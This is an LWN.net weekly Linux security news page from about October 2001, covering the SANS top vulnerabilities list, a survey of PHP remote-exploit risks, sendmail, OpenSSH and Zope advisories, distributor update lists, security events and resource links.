See also: last week's Security page.

Security

News and Editorials

The list is broken down into three large sections. The first concerns itself with general, system-independent problems. These include:

• Default installations of operating systems. Many OS installations leave vulnerabilities, and install more software than is needed.

• Accounts with nonexistent or weak passwords. Some things haven't changed in decades.

• Bad backups. This, of course, is a general systems administration problem. If a site's backups have not been checked recently for completeness and restorability, there are probably problems.

• Large numbers of open ports. Many systems run services they do not need.

• Lack of address filtering on networks. A properly configured network needs to be sure that both incoming and outgoing packets carry reasonable addresses.

• Insufficient logging. Without complete and secure logs, detection and analysis of intrusions is impossible.

• Vulnerable CGI programs. The net probably has not yet begun to see the degree of mayhem that bad CGI programming can cause.

The middle section lists Windows-specific vulnerabilities; readers interested in those are encouraged to go to the SANS page. The final section goes into Unix-specific problems:

• Buffer overflows in rpc services.

• Sendmail vulnerabilities. After a relatively quiet period, sendmail seems to be turning up more problems again - see below.

• Bind vulnerabilities.

• The rsh, rlogin, and rcp commands, which send passwords in clear text and which enable users to set up uncontrolled webs of trust.

• Vulnerabilities in the lpd subsystem.

• Sadmind and mountd. The former is Solaris-specific, but all systems supporting NFS have mountd.

• Bad SNMP passwords.

A survey of PHP vulnerabilities. "Yet Another Hacker Team" has performed an automated audit of a number of PHP-based packages, and has posted the results. The conclusion: much PHP code is vulnerable to remote exploits. Two PHP features are the source of the problems: (1) PHP allows global variables to be set from an HTTP request, and (2) file operations handle URLs transparently. The combination of the two allows a remote attacker to run arbitrary PHP code on the server; this, in turn, gives that attacker shell access.

The survey makes this claim:

PHP is not insecure by default, but makes insecure programming very easy.

Reasonable people could differ on that point. PHP could be far more secure by simply isolating user-supplied information in a special "request" variable. PHP is great stuff (LWN uses a lot of it), but some aspects of the environment are, indeed, insecure by default.

CRYPTO-GRAM special issue. Bruce Schneier has released a special issue of his CRYPTO-GRAM Newsletter devoted to the events of September 11. "People are willing to give up liberties for vague promises of security because they think they have no choice. What they're not being told is that they can have both. It would require people to say no to the FBI's power grab. It would require us to discard the easy answers in favor of thoughtful answers." Worth a read.

Conectiva cuts off 4.x. Conectiva has served notice that the 4.x versions of its distribution are no longer supported, and no further updates will be available. Conectiva customers running ancient versions of the distribution are encouraged to upgrade to something more recent.

Security Reports

OpenSSH 2.9.9 released. OpenSSH 2.9.9 has been released; it includes a security fix that will be important for people using source-based access control.

A new set of sendmail vulnerabilities. Michal Zalewski has found a new set of vulnerabilities in sendmail; they may be used by a local attacker to obtain unauthorized access to the mail system. Versions of sendmail through 8.12 are vulnerable; 8.12.1 has been released and contains fixes for all of the problems. We'll pass on distributor updates as we see them.

Zope DTML scripting security update. There is a new Zope security update out there, fixing a vulnerability in DTML scripting. A suitably clueful user could use the vulnerability to obtain unauthorized access. A fix has been provided by Zope Corp.; expect updates shortly from the distributors that ship Zope as well.

Proprietary products. The following proprietary products were reported to contain vulnerabilities:

• The Cisco PIX firewall has a vulnerability in its mailguard facility; the restrictions on SMTP commands can be bypassed by an attacker.

Updates

Format string vulnerability in groff. A format string problem exists in groff; apparently it could be remotely exploited when it is configured to be used with the lpd printing system. (First LWN report: August 16, 2001).

The stable release of Debian is not vulnerable.

New updates:

• Debian (January 30, 2002) (Japanese version)

Previous updates:

• Conectiva (October 2, 2001)
• Debian (August 10, 2001)
• Progeny (August 16, 2001)
• Red Hat (January 14, 2002)
• Trustix (January 18, 2002)

New updates:

Previous updates:

• Red Hat (October 23, 2001) (mod_auth_pgsql)
• Conectiva (September 28, 2001) (mod_auth_pgsql)
• Conectiva (September 6, 2001) (mod_auth_mysql)

Resources

CERT has a new PGP key, following the expiration of its previous key at the end of September. See the announcement for the new CERT key information.

Events

Upcoming Security Events.

Date	Event	Location
October 10 - 12, 2001	Fourth International Symposium on Recent Advances in Intrusion Detection(RAID 2001)	Davis, CA
November 5 - 8, 2001	8th ACM Conference on Computer and Communication Security(CCS-8)	Philadelphia, PA, USA
November 13 - 15, 2001	International Conference on Information and Communications Security(ICICS 2001)	Xian, China
November 19 - 22, 2001	Black Hat Briefings	Amsterdam
November 21 - 23, 2001	International Information Warfare Symposium	AAL, Lucerne, Swizerland.
November 24 - 30, 2001	Computer Security Mexico	Mexico City
November 29 - 30, 2001	International Cryptography Institute	Washington, DC
December 2 - 7, 2001	Lisa 2001 15th Systems Administration Conference	San Diego, CA.

For additional security-related events, included training courses (which we don't list above) and events further in the future, check out Security Focus' calendar, one of the primary resources we use for building the above list. To submit an event directly to us, please send a plain-text message to lwn@lwn.net.

Section Editor: Jonathan Corbet

LWN Resources


Secured Distributions:
Astaro Security
Castle
Engarde Secure Linux
Immunix
Kaladix Linux
NSA Security Enhanced
Openwall GNU/Linux
Trustix

Security Projects
Bastille
Linux Security Audit Project
Linux Security Module
OpenSSH

Security List Archives
Bugtraq Archive
Firewall Wizards Archive
ISN Archive

Distribution-specific links
Caldera Advisories
Conectiva Updates
Debian Alerts
Kondara Advisories
Esware Alerts
LinuxPPC Security Updates
Mandrake Updates
Red Hat Errata
SuSE Announcements
Turbolinux
Yellow Dog Errata

BSD-specific links
BSDi
FreeBSD
NetBSD
OpenBSD

Security mailing lists
Caldera
Cobalt
Conectiva
Debian
Esware
FreeBSD
Kondara
LASER5
Linux From Scratch
Linux-Mandrake
NetBSD
OpenBSD
Red Hat
Slackware
Stampede
SuSE
Trustix
turboLinux
Yellow Dog

Security Software Archives
munitions
ZedZ.net (formerly replay.com)

Miscellaneous Resources
CERT
CIAC
Comp Sec News Daily
Crypto-GRAM
LinuxLock.org
LinuxSecurity.com
Security Focus
SecurityPortal

Next: Kernel